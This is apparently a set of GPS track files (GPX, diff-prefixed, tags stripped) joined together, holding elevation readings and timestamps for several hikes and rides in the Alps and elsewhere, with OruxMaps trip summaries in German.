+
+
+857.2
+2015-04-14T16:25:41Z
+
+
+867.16
+2015-04-14T16:26:36Z
+
+
+877.32
+2015-04-14T16:28:22Z
+
+
+893.34
+2015-04-14T16:30:34Z
+
+
+900.38
+2015-04-14T16:35:51Z
+
+
+918.61
+2015-04-14T16:37:35Z
+
+
+925.67
+2015-04-14T16:38:29Z
+
+
+934.25
+2015-04-14T16:40:19Z
+
+
+955.58
+2015-04-14T16:42:55Z
+
+
+944.73
+2015-04-14T17:16:35Z
+
+
+937.38
+2015-04-14T17:17:54Z
+
+
+929.63
+2015-04-14T17:19:04Z
+
+
+917.89
+2015-04-14T17:19:56Z
+
+
+905.11
+2015-04-14T17:20:49Z
+
+
+893.65
+2015-04-14T17:21:42Z
+
+
+882.84
+2015-04-14T17:22:32Z
+
+
+864.57
+2015-04-14T17:24:24Z
+
+
+855.62
+2015-04-14T17:25:13Z
+
+
+847.55
+2015-04-14T17:25:59Z
+
+
+831.01
+2015-04-14T17:27:34Z
+
+
+823.17
+2015-04-14T17:29:19Z
+
+
+817.79
+2015-04-14T17:30:23Z
+
+
+828.94
+2015-04-14T17:35:16Z
+
+
+840.49
+2015-04-14T17:36:10Z
+
+
+853.91
+2015-04-14T17:37:09Z
+
+
+866.14
+2015-04-14T17:38:12Z
+
+
+879.89
+2015-04-14T17:39:16Z
+
+
+889.46
+2015-04-14T17:40:30Z
+
+
+891.93
+2015-04-14T17:41:49Z
+
+
+900.33
+2015-04-14T17:42:50Z
+
+
+894.99
+2015-04-14T17:44:32Z
+
+
+892.53
+2015-04-14T17:46:49Z
+
+
+887.96
+2015-04-14T17:47:46Z
+
+
+880.41
+2015-04-14T17:48:52Z
+
+
+874.5
+2015-04-14T17:49:48Z
+
+
+870.24
+2015-04-14T17:50:27Z
+
+
+865.99
+2015-04-14T17:51:52Z
+
+
+860.75
+2015-04-14T17:55:12Z
+
+
+851.36
+2015-04-14T17:56:21Z
+
+
+849.56
+2015-04-14T17:58:35Z
+
+
+849.76
+2015-04-14T17:59:11Z
+
+
+848.55
+2015-04-14T17:59:50Z
+
+
+843.16
+2015-04-14T18:00:30Z
+
+
+841.55
+2015-04-14T18:01:11Z
+
+
+841.2
+2015-04-14T18:02:21Z
+
+
+839.78
+2015-04-14T18:02:55Z
+
+
+835.2
+2015-04-14T18:03:27Z
+
+
+831.34
+2015-04-14T18:03:59Z
+
+
+832.29
+2015-04-14T18:05:16Z
+
+
+828.35
+2015-04-14T18:06:21Z
+
+
+834.77
+2015-04-14T18:07:22Z
+
+
+835.86
+2015-04-14T18:08:05Z
+
+
+833.02
+2015-04-14T18:08:47Z
+ "
+"
+
+
+2016-07-24T08:41:25+0200
+
+
+1460.0
+
+1462.1305241679938
+
+1464.9881208521253
+
+1469.3001563241626
+
+1477.95277546878
+
+1482.7516451341346
+
+1492.318162568008
+
+1530.6523479096597
+
+1536.7921476559031
+
+1552.6956171611735
+
+1575.751817173198
+
+1583.862056123387
+
+1593.997848860574
+
+1608.1770994709582
+
+1629.2077486678859
+
+1646.6555034235512
+
+1655.5407493406624
+
+1682.4476969521672
+
+1708.2232183166907
+
+1723.362096943849
+
+1720.4682751619855
+
+1756.4482511902895
+
+1762.6455775459526
+
+1757.504377230836
+
+1763.5267423434664
+
+1760.8826840098757
+
+1765.9032749561632
+
+1789.8315333190296
+
+1803.5598307464968
+
+1815.2561394569846
+
+1827.0862420515184
+
+1849.3049905125429
+
+1857.9705488273416
+
+1867.4287220002923
+
+1887.076148946134
+
+1912.9837104494725
+
+1921.4652760517638
+
+1936.2508329401985
+
+1963.5728260692542
+
+2001.5445004399717
+
+2042.0757673409987
+
+2047.6819153983197
+
+2059.929022827194
+
+2070.2193482601215
+
+2082.6395860175144
+
+2121.628689699362
+
+2140.7643682637145
+
+2141.7977404710973
+
+2161.3510392509606
+
+2178.3930158357034
+
+2196.682867070238
+
+2217.1489615094556
+
+2226.128938581397
+
+2256.6970219396107
+
+2305.1690883718384
+
+2312.9398643401637
+
+2315.93070436358
+
+2327.861839273584
+
+2343.6462821215728
+
+2345.2035553326045
+
+2350.9335501236087
+
+2352.9647349888087
+
+2359.337132051706
+
+2388.3990929808188
+
+2444.3675601514265
+
+2456.4462188822745
+
+2474.2586498870855
+
+2483.303475262201
+
+2522.436905888874
+
+2532.8537955288875
+
+2537.548224359725
+
+2534.1900627481145
+
+2525.068730364287
+
+2511.136338678157
+
+2496.1869778415085
+
+2480.4485051575407
+
+2456.8844196308405
+
+2448.094663667162
+
+2448.0102607831163 "
+"
+
+
+
+
+
+
+
+LOPASS
+
+
+
+1544.6
+
+
+1543.4
+
+
+1545.1
+
+
+1543.0
+
+
+1538.7
+
+
+1540.9
+
+
+1574.8
+
+
+1578.3
+
+
+1591.6
+
+
+1599.8
+
+
+1620.1
+
+
+1627.9
+
+
+1634.4
+
+
+1637.5
+
+
+1652.4
+
+
+1668.4
+
+
+1680.0
+
+
+1742.7
+
+
+1757.5
+
+
+1773.2
+
+
+1785.4
+
+
+1798.8
+
+
+1806.5
+
+
+1820.6
+
+
+1835.3
+
+
+1844.9
+
+
+1856.7
+
+
+1880.3
+
+
+1887.0
+
+
+1895.2
+
+
+1938.5
+
+
+1960.3
+
+
+2009.6
+
+
+2023.3
+
+
+2002.8
+
+
+1999.6
+
+
+2000.3
+
+
+2013.8
+
+
+2021.0
+
+
+2037.5
+
+
+2063.5
+
+
+2067.9
+
+
+2077.2
+
+
+2075.5
+
+
+2083.0
+
+
+2137.5
+
+
+2169.3
+
+
+2173.0
+
+
+2215.2
+
+
+2223.2
+
+
+2240.4
+
+
+2251.7
+
+
+2265.6
+
+
+2269.6
+
+
+2278.0
+
+
+2288.5
+
+
+2303.7
+
+
+2333.9
+
+
+2316.7
+
+
+2371.9
+
+
+2403.5
+
+
+2425.8
+
+
+2439.7
+
+
+2444.8
+
+
+2447.3
+
+
+2452.8
+
+
+2462.4
+
+
+2470.6
+
+
+2471.6
+
+
+2487.9
+
+
+2499.3
+
+
+2513.0
+
+
+2524.1
+
+
+2564.5
+
+
+2563.7
+
+
+2577.3
+
+
+2588.0
+
+
+2615.8
+
+
+2622.3
+
+
+2613.7
+
+
+2627.7
+
+
+2627.3
+
+
+2639.5
+
+
+2641.4
+
+
+2667.2
+
+
+2677.9
+
+
+2686.5
+
+
+2692.9
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-03-16T20:27:50Z
+
+
+2017-03-16 16:00:00
+
+
+
+
+
+
+537.03
+2017-03-16T07:59:40Z
+
+
+630.76
+2017-03-16T08:16:27Z
+
+
+629.32
+2017-03-16T08:19:36Z
+
+
+630.28
+2017-03-16T08:21:37Z
+
+
+630.76
+2017-03-16T08:22:02Z
+
+
+633.17
+2017-03-16T08:23:19Z
+
+
+641.82
+2017-03-16T08:24:25Z
+
+
+649.51
+2017-03-16T08:25:24Z
+
+
+658.16
+2017-03-16T08:27:38Z
+
+
+660.08
+2017-03-16T08:28:00Z
+
+
+664.41
+2017-03-16T08:28:45Z
+
+
+666.33
+2017-03-16T08:29:00Z
+
+
+690.84
+2017-03-16T08:31:56Z
+
+
+694.69
+2017-03-16T08:32:25Z
+
+
+703.34
+2017-03-16T08:33:24Z
+
+
+710.07
+2017-03-16T08:34:22Z
+
+
+720.65
+2017-03-16T08:35:27Z
+
+
+725.45
+2017-03-16T08:36:12Z
+
+
+730.74
+2017-03-16T08:36:54Z
+
+
+734.58
+2017-03-16T08:37:25Z
+
+
+744.68
+2017-03-16T08:38:43Z
+
+
+746.6
+2017-03-16T08:40:24Z
+
+
+750.45
+2017-03-16T08:41:10Z
+
+
+752.85
+2017-03-16T08:41:50Z
+
+
+757.18
+2017-03-16T08:42:21Z
+
+
+759.1
+2017-03-16T08:42:37Z
+
+
+766.31
+2017-03-16T08:43:44Z
+
+
+772.56
+2017-03-16T08:44:30Z
+
+
+783.13
+2017-03-16T08:45:57Z
+
+
+784.57
+2017-03-16T08:46:17Z
+
+
+796.59
+2017-03-16T08:48:06Z
+
+
+800.92
+2017-03-16T08:48:51Z
+
+
+815.82
+2017-03-16T08:51:54Z
+
+
+816.78
+2017-03-16T08:52:19Z
+
+
+823.03
+2017-03-16T08:53:07Z
+
+
+863.88
+2017-03-16T08:58:28Z
+
+
+878.78
+2017-03-16T09:02:15Z
+
+
+891.28
+2017-03-16T09:03:39Z
+
+
+918.68
+2017-03-16T09:06:59Z
+
+
+926.85
+2017-03-16T09:08:19Z
+
+
+958.09
+2017-03-16T09:17:14Z
+
+
+985.97
+2017-03-16T09:20:49Z
+
+
+1003.75
+2017-03-16T09:24:12Z
+
+
+1012.89
+2017-03-16T09:26:12Z
+
+
+1030.19
+2017-03-16T09:30:21Z
+
+
+1031.63
+2017-03-16T09:31:15Z
+
+
+1033.55
+2017-03-16T09:34:18Z
+
+
+1032.11
+2017-03-16T09:39:00Z
+
+
+1033.55
+2017-03-16T09:40:14Z
+
+
+1056.15
+2017-03-16T09:43:10Z
+
+
+1057.59
+2017-03-16T10:03:09Z
+
+
+1063.36
+2017-03-16T10:04:53Z
+
+
+1093.16
+2017-03-16T10:08:03Z
+
+
+1119.11
+2017-03-16T10:10:53Z
+
+
+1124.88
+2017-03-16T10:14:32Z
+
+
+1136.9
+2017-03-16T10:15:57Z
+
+
+1187.85
+2017-03-16T10:21:56Z
+
+
+1204.67
+2017-03-16T10:24:20Z
+
+
+1229.18
+2017-03-16T10:28:34Z
+
+
+1238.32
+2017-03-16T10:30:04Z
+
+
+1261.39
+2017-03-16T10:35:09Z
+
+
+1268.12
+2017-03-16T10:36:40Z
+
+
+1280.61
+2017-03-16T10:38:58Z
+
+
+1288.3
+2017-03-16T10:40:41Z
+ "
+"
+
+
+Habart
+
+
+
+
+
+OruxMaps
+2015-07-03T07:09:15Z
+
+
+Habart
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Habart</h2><br /><p>Startzeit: 07/03/2015 09:09</p><p>Zielzeit: 07/03/2015 11:38</p><p>Strecke: 3,5km (02:29)</p><p>Bewegungszeit: 01:18</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 6,5km/h</p><p>Minimale Höhe: 1618m</p><p>Maximale Höhe: 2301m</p><p>Steig-Geschw.: 417,3m/h</p><p>Sink-Geschw.: -540,4m/h</p><p>Aufstieg: 714m</p><p>Abstieg: -293m</p><p>Steigzeit: 01:42</p><p>Sinkzeit: 00:32</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1618.0
+2015-07-03T07:09:13Z
+
+
+1618.9
+2015-07-03T07:12:01Z
+
+
+1636.99
+2015-07-03T07:14:36Z
+
+
+1639.0
+2015-07-03T07:15:04Z
+
+
+1653.87
+2015-07-03T07:16:13Z
+
+
+1665.99
+2015-07-03T07:17:37Z
+
+
+1673.24
+2015-07-03T07:18:26Z
+
+
+1687.25
+2015-07-03T07:19:36Z
+
+
+1704.75
+2015-07-03T07:22:30Z
+
+
+1708.85
+2015-07-03T07:23:55Z
+
+
+1741.38
+2015-07-03T07:27:09Z
+
+
+1770.39
+2015-07-03T07:31:42Z
+
+
+1793.99
+2015-07-03T07:35:06Z
+
+
+1804.97
+2015-07-03T07:35:57Z
+
+
+1819.83
+2015-07-03T07:39:01Z
+
+
+1831.37
+2015-07-03T07:41:27Z
+
+
+1847.8
+2015-07-03T07:43:24Z
+
+
+1852.89
+2015-07-03T07:44:23Z
+
+
+1891.58
+2015-07-03T07:47:56Z
+
+
+1932.9
+2015-07-03T07:54:15Z
+
+
+1960.24
+2015-07-03T07:58:58Z
+
+
+1970.27
+2015-07-03T07:59:57Z
+
+
+1986.99
+2015-07-03T08:02:39Z
+
+
+1998.43
+2015-07-03T08:06:06Z
+
+
+2011.75
+2015-07-03T08:06:46Z
+
+
+2040.31
+2015-07-03T08:11:02Z
+
+
+2068.46
+2015-07-03T08:14:47Z
+
+
+2088.46
+2015-07-03T08:18:18Z
+
+
+2139.44
+2015-07-03T08:27:43Z
+
+
+2162.8
+2015-07-03T08:30:20Z
+
+
+2161.47
+2015-07-03T08:31:57Z
+
+
+2165.6
+2015-07-03T08:45:54Z
+
+
+2205.86
+2015-07-03T08:50:25Z
+
+
+2277.5
+2015-07-03T09:00:49Z
+
+
+2289.25
+2015-07-03T09:02:22Z
+
+
+2301.34
+2015-07-03T09:04:07Z
+
+
+2285.49
+2015-07-03T09:09:22Z
+
+
+2252.37
+2015-07-03T09:13:01Z
+
+
+2245.49
+2015-07-03T09:14:05Z
+
+
+2206.9
+2015-07-03T09:15:56Z
+
+
+2167.87
+2015-07-03T09:18:25Z
+
+
+2182.03
+2015-07-03T09:20:39Z
+
+
+2149.6
+2015-07-03T09:22:25Z
+
+
+2096.87
+2015-07-03T09:30:55Z
+
+
+2070.04
+2015-07-03T09:33:14Z
+
+
+2039.9
+2015-07-03T09:36:28Z
+
+
+2016.13
+2015-07-03T09:38:20Z
+ "
+"
+
+
+Arita-Tour
+
+fuemm63
+
+fuemm63 on GPSies.com
+GPSiesUserOnWeb
+
+
+Arita-Tour on GPSies.com
+trackOnWeb
+2016-10-18T21:10:40Z
+
+one-way trip
+90.0
+5461.431078675756
+58.0
+138.0
+57.0
+
+Arita-Tour on GPSies.com
+
+trackOnWeb
+
+
+63.0
+2010-01-01T00:00:00Z
+
+
+63.0
+2010-01-01T00:00:05Z
+
+
+63.0
+2010-01-01T00:00:42Z
+
+
+60.0
+2010-01-01T00:01:59Z
+
+
+58.0
+2010-01-01T00:03:05Z
+
+
+68.0
+2010-01-01T00:03:52Z
+
+
+69.0
+2010-01-01T00:04:17Z
+
+
+70.0
+2010-01-01T00:04:48Z
+
+
+66.0
+2010-01-01T00:06:06Z
+
+
+65.0
+2010-01-01T00:06:47Z
+
+
+65.0
+2010-01-01T00:07:31Z
+
+
+71.0
+2010-01-01T00:08:42Z
+
+
+71.0
+2010-01-01T00:09:16Z
+
+
+71.0
+2010-01-01T00:09:53Z
+
+
+71.0
+2010-01-01T00:10:07Z
+
+
+82.0
+2010-01-01T00:12:33Z
+
+
+98.0
+2010-01-01T00:13:36Z
+
+
+100.0
+2010-01-01T00:13:42Z
+
+
+93.0
+2010-01-01T00:13:53Z
+
+
+83.0
+2010-01-01T00:14:45Z
+
+
+79.0
+2010-01-01T00:15:09Z
+
+
+79.0
+2010-01-01T00:15:17Z
+
+
+79.0
+2010-01-01T00:15:27Z
+
+
+83.0
+2010-01-01T00:16:13Z
+
+
+82.0
+2010-01-01T00:16:25Z
+
+
+86.0
+2010-01-01T00:17:35Z
+
+
+87.0
+2010-01-01T00:17:58Z
+
+
+92.0
+2010-01-01T00:19:10Z
+
+
+96.0
+2010-01-01T00:20:03Z
+
+
+97.0
+2010-01-01T00:20:25Z
+
+
+96.0
+2010-01-01T00:20:46Z
+
+
+102.0
+2010-01-01T00:21:43Z
+
+
+104.0
+2010-01-01T00:22:00Z
+
+
+110.0
+2010-01-01T00:23:22Z
+
+
+107.0
+2010-01-01T00:23:51Z
+
+
+111.0
+2010-01-01T00:24:13Z
+
+
+119.0
+2010-01-01T00:24:52Z
+
+
+124.0
+2010-01-01T00:25:12Z
+
+
+138.0
+2010-01-01T00:25:42Z
+
+
+137.0
+2010-01-01T00:26:11Z
+
+
+133.0
+2010-01-01T00:26:23Z
+
+
+135.0
+2010-01-01T00:26:52Z
+
+
+129.0
+2010-01-01T00:27:16Z
+
+
+118.0
+2010-01-01T00:27:49Z
+
+
+107.0
+2010-01-01T00:28:22Z
+
+
+104.0
+2010-01-01T00:28:32Z
+
+
+104.0
+2010-01-01T00:28:38Z
+
+
+111.0
+2010-01-01T00:30:43Z
+
+
+101.0
+2010-01-01T00:31:58Z
+
+
+99.0
+2010-01-01T00:32:25Z
+
+
+96.0
+2010-01-01T00:32:46Z
+ "
+"
+
+
+
+
+
+
+
+Track 23.10.2015 - Hundwiler Höhi
+
+
+
+779.77
+
+
+779.77
+
+
+786.98
+
+
+788.9
+
+
+789.86
+
+
+796.59
+
+
+809.09
+
+
+821.58
+
+
+887.43
+
+
+908.1
+
+
+911.47
+
+
+952.32
+
+
+988.85
+
+
+1013.37
+
+
+1032.11
+
+
+1046.05
+
+
+1057.59
+
+
+1062.87
+
+
+1063.84
+
+
+1092.68
+
+
+1090.27
+
+
+1103.73
+
+
+1090.75
+
+
+1093.16
+
+
+1113.34
+
+
+1108.54
+
+
+1109.5
+
+
+1125.84
+
+
+1166.22
+
+
+1181.12
+
+
+1188.81
+
+
+1190.73
+
+
+1199.86
+
+
+1208.03
+
+
+1243.6
+
+
+1248.41
+
+
+1256.58
+
+
+1265.71
+
+
+1287.34
+
+
+1299.84
+
+
+1292.63
+
+
+1298.4
+
+
+1291.67
+
+
+1298.4
+
+
+1290.23
+
+
+1272.92
+
+
+1261.39
+
+
+1252.25
+
+
+1248.41
+
+
+1210.44
+
+
+1204.67
+
+
+1205.15
+
+
+1194.58
+
+
+1190.25
+
+
+1184.96
+
+
+1168.62
+
+
+1127.76
+
+
+1113.34
+
+
+1115.27
+
+
+1109.02
+
+
+1096.04
+
+
+1090.27
+
+
+1089.31
+
+
+1094.12
+
+
+1108.06
+
+
+1087.39
+
+
+1097.48
+
+
+1072.01
+
+
+1060.95
+
+
+1059.03
+
+
+1053.74
+
+
+1049.9
+
+
+1037.4
+
+
+1029.23
+
+
+1016.25
+
+
+1018.65
+
+
+970.59
+
+
+952.32
+
+
+933.58
+
+
+926.85
+
+
+922.52
+
+
+915.79
+
+
+891.76
+
+
+822.06
+
+
+793.22
+
+
+783.61
+
+
+784.09
+
+
+786.02
+
+
+787.46
+ "
+"
+
+
+
+Polar
+
+
+
+2015-09-12T09:32:28Z
+
+
+
+
+1360.0
+2015-09-12T09:32:30Z
+
+
+1353.0
+2015-09-12T09:33:45Z
+
+
+1351.0
+2015-09-12T09:34:14Z
+
+
+1344.0
+2015-09-12T09:34:49Z
+
+
+1333.0
+2015-09-12T09:35:32Z
+
+
+1331.0
+2015-09-12T09:36:20Z
+
+
+1342.0
+2015-09-12T09:39:44Z
+
+
+1345.0
+2015-09-12T09:42:13Z
+
+
+1361.0
+2015-09-12T09:44:10Z
+
+
+1364.0
+2015-09-12T09:44:40Z
+
+
+1368.0
+2015-09-12T09:46:32Z
+
+
+1388.0
+2015-09-12T09:47:55Z
+
+
+1420.0
+2015-09-12T09:50:09Z
+
+
+1470.0
+2015-09-12T09:53:45Z
+
+
+1515.0
+2015-09-12T09:57:40Z
+
+
+1542.0
+2015-09-12T09:59:50Z
+
+
+1581.0
+2015-09-12T10:03:11Z
+
+
+1600.0
+2015-09-12T10:04:44Z
+
+
+1624.0
+2015-09-12T10:06:33Z
+
+
+1640.0
+2015-09-12T10:08:02Z
+
+
+1652.0
+2015-09-12T10:08:56Z
+
+
+1709.0
+2015-09-12T10:14:47Z
+
+
+1721.0
+2015-09-12T10:15:54Z
+
+
+1751.0
+2015-09-12T10:19:26Z
+
+
+1757.0
+2015-09-12T10:20:02Z
+
+
+1769.0
+2015-09-12T10:21:11Z
+
+
+1777.0
+2015-09-12T10:22:38Z
+
+
+1801.0
+2015-09-12T10:24:48Z
+
+
+1808.0
+2015-09-12T10:26:48Z
+
+
+1825.0
+2015-09-12T10:28:46Z
+
+
+1841.0
+2015-09-12T10:31:55Z
+
+
+1868.0
+2015-09-12T10:33:53Z
+
+
+1909.0
+2015-09-12T10:37:41Z
+
+
+1917.0
+2015-09-12T10:38:47Z
+
+
+1953.0
+2015-09-12T10:42:00Z
+
+
+2003.0
+2015-09-12T10:48:14Z
+
+
+2055.0
+2015-09-12T10:52:55Z
+
+
+2085.0
+2015-09-12T10:55:59Z
+
+
+2111.0
+2015-09-12T10:58:37Z
+
+
+2127.0
+2015-09-12T11:00:31Z
+
+
+2152.0
+2015-09-12T11:03:57Z
+
+
+2170.0
+2015-09-12T11:05:46Z
+
+
+2185.0
+2015-09-12T11:07:56Z
+
+
+2216.0
+2015-09-12T11:11:19Z
+
+
+2254.0
+2015-09-12T11:18:05Z
+
+
+2271.0
+2015-09-12T11:19:34Z
+
+
+2291.0
+2015-09-12T11:21:57Z
+
+
+2303.0
+2015-09-12T11:24:03Z
+
+
+2324.0
+2015-09-12T11:26:55Z
+
+
+2328.0
+2015-09-12T11:27:36Z
+
+
+2347.0
+2015-09-12T11:30:50Z
+
+
+2388.0
+2015-09-12T11:35:32Z
+
+
+2394.0
+2015-09-12T11:46:05Z
+
+
+2432.0
+2015-09-12T11:52:46Z
+
+
+2418.0
+2015-09-12T11:56:58Z
+
+
+2407.0
+2015-09-12T11:58:51Z
+
+
+2399.0
+2015-09-12T12:01:06Z
+
+
+2462.0
+2015-09-12T12:06:03Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+850.0
+2014-11-29T06:57:07Z
+
+
+849.799987792969
+2014-11-29T06:57:54Z
+
+
+854.400024414062
+2014-11-29T06:58:23Z
+
+
+862.400024414062
+2014-11-29T06:59:59Z
+
+
+874.799987792969
+2014-11-29T07:01:32Z
+
+
+890.400024414062
+2014-11-29T07:02:42Z
+
+
+894.599975585938
+2014-11-29T07:03:08Z
+
+
+897.400024414062
+2014-11-29T07:03:56Z
+
+
+901.799987792969
+2014-11-29T07:04:37Z
+
+
+910.400024414062
+2014-11-29T07:05:16Z
+
+
+914.599975585938
+2014-11-29T07:05:51Z
+
+
+933.0
+2014-11-29T07:07:24Z
+
+
+946.799987792969
+2014-11-29T07:08:36Z
+
+
+956.599975585938
+2014-11-29T07:09:30Z
+
+
+992.599975585938
+2014-11-29T07:12:35Z
+
+
+1019.20001220703
+2014-11-29T07:14:51Z
+
+
+1032.59997558594
+2014-11-29T07:16:15Z
+
+
+1054.40002441406
+2014-11-29T07:18:50Z
+
+
+1089.19995117188
+2014-11-29T07:22:24Z
+
+
+1100.0
+2014-11-29T07:23:44Z
+
+
+1114.80004882812
+2014-11-29T07:25:14Z
+
+
+1182.59997558594
+2014-11-29T07:31:12Z
+
+
+1189.0
+2014-11-29T07:31:48Z
+
+
+1206.0
+2014-11-29T07:33:15Z
+
+
+1222.0
+2014-11-29T07:34:23Z
+
+
+1246.0
+2014-11-29T07:36:10Z
+
+
+1256.0
+2014-11-29T07:36:58Z
+
+
+1264.0
+2014-11-29T07:37:38Z
+
+
+1328.80004882812
+2014-11-29T07:43:10Z
+
+
+1356.0
+2014-11-29T07:45:07Z
+
+
+1362.59997558594
+2014-11-29T07:45:36Z
+
+
+1367.59997558594
+2014-11-29T07:46:01Z
+
+
+1383.59997558594
+2014-11-29T07:47:17Z
+
+
+1400.40002441406
+2014-11-29T07:48:28Z
+
+
+1412.59997558594
+2014-11-29T07:49:21Z
+
+
+1425.40002441406
+2014-11-29T07:51:44Z
+
+
+1451.19995117188
+2014-11-29T07:53:39Z
+
+
+1492.80004882812
+2014-11-29T07:56:50Z
+
+
+1519.0
+2014-11-29T07:58:55Z
+
+
+1526.19995117188
+2014-11-29T07:59:31Z
+
+
+1542.19995117188
+2014-11-29T08:00:51Z
+
+
+1549.80004882812
+2014-11-29T08:01:36Z
+
+
+1596.80004882812
+2014-11-29T08:05:11Z
+
+
+1602.40002441406
+2014-11-29T08:05:39Z
+
+
+1619.0
+2014-11-29T08:06:59Z
+
+
+1638.19995117188
+2014-11-29T08:08:22Z
+
+
+1654.59997558594
+2014-11-29T08:10:43Z
+
+
+1666.0
+2014-11-29T08:11:43Z
+
+
+1685.0
+2014-11-29T08:13:26Z
+
+
+1677.19995117188
+2014-11-29T08:15:19Z
+
+
+1674.59997558594
+2014-11-29T08:18:46Z
+
+
+1714.19995117188
+2014-11-29T08:22:15Z
+
+
+1753.59997558594
+2014-11-29T08:25:33Z
+
+
+1769.80004882812
+2014-11-29T08:27:08Z
+
+
+1786.80004882812
+2014-11-29T08:28:40Z
+
+
+1799.59997558594
+2014-11-29T08:30:30Z
+
+
+1808.59997558594
+2014-11-29T08:31:57Z
+
+
+1859.19995117188
+2014-11-29T08:38:48Z
+
+
+1891.0
+2014-11-29T08:42:24Z
+ "
+"
+
+
+
+ Lovere - S. Giovanni
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Emeindra
+
+
+
+
+
+OruxMaps
+2016-06-02T09:57:08Z
+
+
+Emeindra
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Emeindra</h2><br /><p>Startzeit: 06/02/2016 11:56</p><p>Zielzeit: 06/02/2016 13:36</p><p>Strecke: 5,3km (01:39)</p><p>Bewegungszeit: 01:15</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 981m</p><p>Maximale Höhe: 1490m</p><p>Steig-Geschw.: 437,9m/h</p><p>Sink-Geschw.: -397m/h</p><p>Aufstieg: 565m</p><p>Abstieg: -56m</p><p>Steigzeit: 01:17</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+981.44
+2016-06-02T09:56:47Z
+
+
+987.13
+2016-06-02T09:57:13Z
+
+
+990.85
+2016-06-02T09:58:09Z
+
+
+998.88
+2016-06-02T09:58:44Z
+
+
+998.87
+2016-06-02T10:00:30Z
+
+
+1006.88
+2016-06-02T10:01:16Z
+
+
+1005.13
+2016-06-02T10:03:19Z
+
+
+1014.97
+2016-06-02T10:05:26Z
+
+
+1014.75
+2016-06-02T10:06:05Z
+
+
+1019.21
+2016-06-02T10:06:44Z
+
+
+1025.82
+2016-06-02T10:09:26Z
+
+
+1033.4
+2016-06-02T10:10:30Z
+
+
+1034.26
+2016-06-02T10:11:40Z
+
+
+1034.04
+2016-06-02T10:12:21Z
+
+
+1054.75
+2016-06-02T10:15:32Z
+
+
+1060.89
+2016-06-02T10:16:35Z
+
+
+1074.61
+2016-06-02T10:18:30Z
+
+
+1089.83
+2016-06-02T10:19:53Z
+
+
+1085.27
+2016-06-02T10:20:39Z
+
+
+1086.67
+2016-06-02T10:21:24Z
+
+
+1089.9
+2016-06-02T10:23:05Z
+
+
+1110.01
+2016-06-02T10:24:06Z
+
+
+1153.5
+2016-06-02T10:31:04Z
+
+
+1188.85
+2016-06-02T10:36:51Z
+
+
+1191.28
+2016-06-02T10:37:42Z
+
+
+1207.24
+2016-06-02T10:41:55Z
+
+
+1214.88
+2016-06-02T10:43:58Z
+
+
+1223.41
+2016-06-02T10:45:06Z
+
+
+1238.75
+2016-06-02T10:48:25Z
+
+
+1302.41
+2016-06-02T10:57:43Z
+
+
+1320.76
+2016-06-02T11:00:05Z
+
+
+1330.37
+2016-06-02T11:02:14Z
+
+
+1331.0
+2016-06-02T11:03:46Z
+
+
+1332.77
+2016-06-02T11:05:41Z
+
+
+1329.89
+2016-06-02T11:05:57Z
+
+
+1344.24
+2016-06-02T11:06:39Z
+
+
+1349.81
+2016-06-02T11:09:33Z
+
+
+1343.01
+2016-06-02T11:11:54Z
+
+
+1349.0
+2016-06-02T11:14:18Z
+
+
+1351.91
+2016-06-02T11:15:24Z
+
+
+1358.01
+2016-06-02T11:16:11Z
+
+
+1377.81
+2016-06-02T11:20:07Z
+
+
+1391.97
+2016-06-02T11:22:59Z
+
+
+1420.73
+2016-06-02T11:25:36Z
+
+
+1433.37
+2016-06-02T11:27:40Z
+
+
+1385.88
+2016-06-02T11:29:05Z
+
+
+1431.87
+2016-06-02T11:29:36Z
+
+
+1479.79
+2016-06-02T11:33:49Z
+
+
+1488.22
+2016-06-02T11:35:56Z
+
+
+1486.94
+2016-06-02T11:36:36Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-21T17:12:17Z
+
+
+Track 038
+
+
+
+
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+
+
+2015-04-21T18:41:21Z
+ "
+"
+
+
+
+
+
+
+
+Faleralp - Blatten
+
+
+
+1764.32421875
+
+
+1764.0625
+
+
+1766.20703125
+
+
+1771.56640625
+
+
+1780.89453125
+
+
+1783.00390625
+
+
+1779.4609375
+
+
+1779.51171875
+
+
+1789.77734375
+
+
+1794.21484375
+
+
+1802.93359375
+
+
+1835.5
+
+
+1854.5390625
+
+
+1856.69921875
+
+
+1849.24609375
+
+
+1855.13671875
+
+
+1848.890625
+
+
+1834.24609375
+
+
+1828.88671875
+
+
+1838.0703125
+
+
+1845.296875
+
+
+1848.77734375
+
+
+1862.046875
+
+
+1850.703125
+
+
+1861.76171875
+
+
+1849.72265625
+
+
+1856.48828125
+
+
+1857.234375
+
+
+1846.30078125
+
+
+1831.60546875
+
+
+1807.4609375
+
+
+1796.69140625
+
+
+1765.43359375
+
+
+1751.34375
+
+
+1738.88671875
+
+
+1731.9921875
+
+
+1723.05859375
+
+
+1694.3125
+
+
+1669.78515625
+
+
+1674.07421875
+
+
+1663.14453125
